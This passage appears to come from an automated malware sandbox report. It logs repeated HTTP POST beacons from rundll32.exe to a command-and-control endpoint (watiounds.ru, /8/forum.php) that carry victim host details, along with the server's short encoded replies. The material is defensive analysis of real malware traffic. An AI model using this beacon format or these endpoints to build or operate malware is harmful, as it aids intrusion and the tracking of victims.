                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:49.563074112 CEST245INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 4d 4e 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAMNZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          188192.168.2.224935395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:49.878778934 CEST245OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:50.015465021 CEST246INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 42 59 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNBYMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          189192.168.2.224935495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:50.332216978 CEST246OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:50.458316088 CEST247INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:50 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZKPAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          19192.168.2.224918495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:03.358542919 CEST53OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:03.484359026 CEST53INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:03 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 42 59 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFBYUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          190192.168.2.224935595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:50.774102926 CEST248OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:50.900412083 CEST248INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:50 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 42 59 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYBYBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          191192.168.2.224935695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:51.215806961 CEST249OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:51.339344025 CEST249INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:51 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 5a 41 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYZABARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          192192.168.2.224935795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:51.652221918 CEST250OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:51.780009985 CEST250INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:51 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4d 4e 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYMNBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          193192.168.2.224935895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:52.100404024 CEST251OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:52.246025085 CEST251INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTZAGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          194192.168.2.224935995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:52.585014105 CEST252OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:52.714637995 CEST252INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGZATARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          195192.168.2.224936095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:53.024794102 CEST253OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:53.147536993 CEST254INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 43 58 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZCXAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          196192.168.2.224936195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:53.464418888 CEST254OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:53.586973906 CEST255INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 59 42 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFYBUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          197192.168.2.224936295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:53.894011021 CEST256OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:54.019001007 CEST256INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:54 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZNMAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          198192.168.2.224936395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:54.330005884 CEST257OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:54.455307007 CEST257INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:54 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 5a 41 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCZAXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          199192.168.2.224936495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:54.780611038 CEST258OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:54.903017044 CEST258INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:54 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 51 4a 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBQJYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.224916795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:16:44.986207008 CEST6OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:16:45.113055944 CEST7INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:16:45 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZJQAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          20192.168.2.224918595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:18.564796925 CEST56OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:18.691098928 CEST56INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 42 59 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMBYNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          200192.168.2.224936595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:55.218905926 CEST259OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:55.341022968 CEST259INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNHSMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          201192.168.2.224936695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:55.684127092 CEST260OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:55.806865931 CEST260INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 56 45 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNVEMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          202192.168.2.224936795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:56.126389980 CEST261OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
